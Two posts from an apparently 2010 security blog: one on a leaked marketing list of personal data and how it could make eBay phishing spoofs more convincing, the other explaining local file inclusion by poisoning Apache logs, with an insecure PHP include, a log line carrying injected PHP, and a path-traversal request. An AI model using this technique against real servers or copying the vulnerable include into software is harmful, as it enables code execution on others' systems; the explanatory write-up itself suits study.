Monthly Archives: October 2010

Email Lists

23 Oct 2010

The Problem

Last week I came across a data set of 1 million emails who were said to have “opted-in” to spam. It listed: email, name, address, city, state, zip, extended zip, phone number, date of birth, time added, IP and the source.

To anyone that’s a lot of personal information!

How did they get this information, I had a look at the sources column which contained these distinct values.

classifieds.com
amny.com
chicagotribune.com
baltimoresun.com
washingtonpost.com
careerbuilder.com
greenwichtime.com
orlandosun.com
apartments.com
metpronews.com
dailypress.com
courant.com
latimes.com
sun-sentinel.com
stamfordadvocate.com

My theory is they filled in all this unnecessary information on signup and left a box ticked that allowed the website to share this information.

The Attack

eBay sent this message to Steven Roddis (steven*****). Your registered name is included to show this message originated from eBay.

With a dump like the one I found, it’s easy to spoof eBay emails with more apparent legitimacy.

The Mitigation

Use fake info everywhere, sites like http://www.bugmenot.com, http://www.mailinator.com and http://www.fakenamegenerator.com can help.

Of course your bank and ebay should know your real name, dob, etc, but the LA Times can think I’m:

Beulah Williams
4263 Joseph Street
Milwaukee, WI 53226

Attack Vector: Log Files

9 Oct 2010

I’ve had this on my mind for a long time, however I’ve finally felt like writing it up. How many times have you seen the bad code below?

<?php
include('pages/'.$_GET['page'].'.php');  //insecure code
?>

Any sane sysadmin will turn off allow_url_fopen to help mitigate remote file injection attacks. So your stuck with local file injection instead. However most servers are configured to allow the web server user to read log files as well.
Log files look like (on Apache):

1.1.1.1- - [24/Aug/2010:05:19:38 -0700] "GET /j.php HTTP/1.1" 200 503 "http://www.example.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 (.NET CLR 3.5.30729)"
1.1.1.1- - [24/Aug/2010:05:19:39 -0700] "GET /j.php HTTP/1.1" 200 513 "<?php phpinfo(); ?>"

So if you can inject code in the log file by a custom user-agent, a simple http://www.example.com/?page=../../logs/example.com/http/access.log request will let you include the log file with contains the code.